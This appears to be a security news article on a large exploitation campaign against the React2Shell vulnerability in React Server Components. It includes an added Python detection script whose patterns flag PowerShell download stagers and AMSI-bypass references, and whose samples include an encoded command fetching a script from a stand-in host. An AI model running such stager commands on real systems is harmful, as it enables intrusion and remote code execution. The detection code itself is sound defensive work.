Hackers Launch 8.1 Million Attack Sessions Exploiting React2Shell Vulnerability

The React Server Components (RSC) vulnerability, tracked as CVE-2025-55182 and commonly referred to as “React2Shell,” continues to fuel one of the most aggressive opportunistic exploitation campaigns in recent memory.

Security monitoring firm GreyNoise reported on January 7, 2026, that the vulnerability has been exploited in over 8.1 million attack sessions since its initial disclosure, with attackers showing no signs of slowing their assault on unprepared organizations.

The campaign’s scale has reached unprecedented levels. Daily exploitation volumes have stabilized between 300,000 and 400,000 attack sessions, following a December peak of more than 430,000 daily attempts.

This sustained attack rate underscores the severity of the vulnerability and its appeal to threat actors operating across diverse geographic regions and network infrastructures.

GreyNoise’s telemetry identified 8,163 unique source IP addresses spanning 1,071 autonomous systems across 101 countries, demonstrating the borderless nature of the exploitation wave.

Infrastructure analysis reveals a heavy reliance on cloud providers, with Amazon Web Services accounting for more than one-third of observed exploitation traffic.

This concentration among legitimate cloud platforms highlights attackers’ strategy of leveraging compromised or rented infrastructure to scale their attacks.

Notably, nearly 50% of exploitation IPs were first observed by GreyNoise in December 2025, indicating rapid churn through VPS and proxy pools, a hallmark of large-scale, automated campaigns.

Threat actors are employing relatively standard exploitation techniques despite the vulnerability’s critical nature.

Attack chains begin with proof-of-execution (PoE) validation using PowerShell arithmetic commands, followed by base64-encoded PowerShell stagers that download additional payloads.

Stage-two payloads leverage AMSI (Antimalware Scan Interface) bypass techniques through reflection-based manipulation of System.Management.Automation.AmsiUtils, a well-documented evasion method widely available in commodity toolkits.

The attack arsenal comprises 70,000+ unique payloads, with attack patterns spanning system reconnaissance, reverse-shell deployment, SSH key installation for persistence, and cryptomining operations.

Network fingerprinting analysis identified 700 unique JA4H hashes and 340 unique JA4T hashes, indicating diverse tooling and bot variants driving the campaign.

GreyNoise’s analysis confirms the exploitation infrastructure is overwhelmingly automation-driven, dominated by Go HTTP clients and scanner-tagged user agents.

However, the simplicity of exploitation techniques masks the sophistication of the infrastructure supporting this campaign.

Defenders lacking patches face a continuous siege, with nearly instantaneous discovery and exploitation attempts targeting vulnerable React Server Component deployments.

Organizations running unpatched React or Next.js instances face an immediate risk of compromise. Security teams are urged to prioritize patching, implement dynamic IP blocking using updated threat feeds, and deploy endpoint detection focused on PowerShell execution patterns and AMSI-bypass indicators.
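The endpoint-detection advice above, shown as an added example that is not from GreyNoise or the original article: a Python triage function that decodes `-EncodedCommand` arguments and tags process command lines for the arithmetic probe, download stager and AmsiUtils reference described earlier. The regex heuristics, tag names and sample command lines are constructed assumptions.

```python
import base64
import re

# Heuristic rules: assumptions for illustration, not GreyNoise or vendor signatures.
RULES = {
    "arithmetic_probe": re.compile(r"^\s*\d+\s*[-+*/]\s*\d+\s*$"),
    "download_stager": re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|net\.webclient"),
    "amsi_reference": re.compile(r"(?i)amsiutils"),
}
FLAG_ARG = re.compile(r"[-/]([A-Za-z]+)\s+([A-Za-z0-9+/=]{8,})")
INLINE_CMD = re.compile(r"(?i)[-/]c(?:ommand)?\s+[\"']?([^\"']+)[\"']?\s*$")

def decode_encoded_commands(cmdline):
    """Decode every -EncodedCommand argument (base64 over UTF-16LE text)."""
    decoded = []
    for flag, blob in FLAG_ARG.findall(cmdline):
        # PowerShell accepts prefixes of -EncodedCommand (-e, -enc, ...) and -ec.
        if not ("encodedcommand".startswith(flag.lower()) or flag.lower() == "ec"):
            continue
        try:
            raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
        except ValueError:
            continue  # not base64 after all; leave it to other rules
        decoded.append(raw.decode("utf-16-le", errors="replace"))
    return decoded

def analyze(cmdline):
    """Return sorted indicator tags for one process-creation command line."""
    if not re.search(r"(?i)powershell|pwsh", cmdline):
        return []
    bodies = decode_encoded_commands(cmdline)
    tags = {"encoded_command"} if bodies else set()
    inline = INLINE_CMD.search(cmdline)
    if inline:
        bodies.append(inline.group(1))  # body of -c / -Command, if present
    tags.update(name for name, rx in RULES.items() for b in bodies if rx.search(b))
    return sorted(tags)

def encode(script):
    """Build a -EncodedCommand value for the constructed samples below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed command lines, not captured traffic; example.invalid never resolves.
SAMPLES = [
    'powershell -c "41*271"',
    "powershell -NoP -Enc " + encode("(New-Object Net.WebClient).DownloadString('http://example.invalid/s2')"),
    "powershell -e " + encode("Write-Output 'System.Management.Automation.AmsiUtils'"),
    r"powershell -ExecutionPolicy Unrestricted -File C:\scripts\backup.ps1",
]
```

Feed `analyze` the command-line field from process-creation telemetry; the benign fourth sample shows that `-ExecutionPolicy` is not mistaken for an encoded-command flag.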

| CVE ID | Vulnerability Name | Affected Components | CVSS Score | Exploitation Status | Attack Vector |
|---|---|---|---|---|---|
| CVE-2025-55182 | React Server Components (RSC) Flight Protocol Unsafe Deserialization RCE | React, Next.js, downstream RSC implementations | 9.8 (Critical) | Active, 8.1M+ sessions | |


The post Hackers Launch 8.1 Million Attack Sessions Exploiting React2Shell Vulnerability appeared first on Cyber Security News.

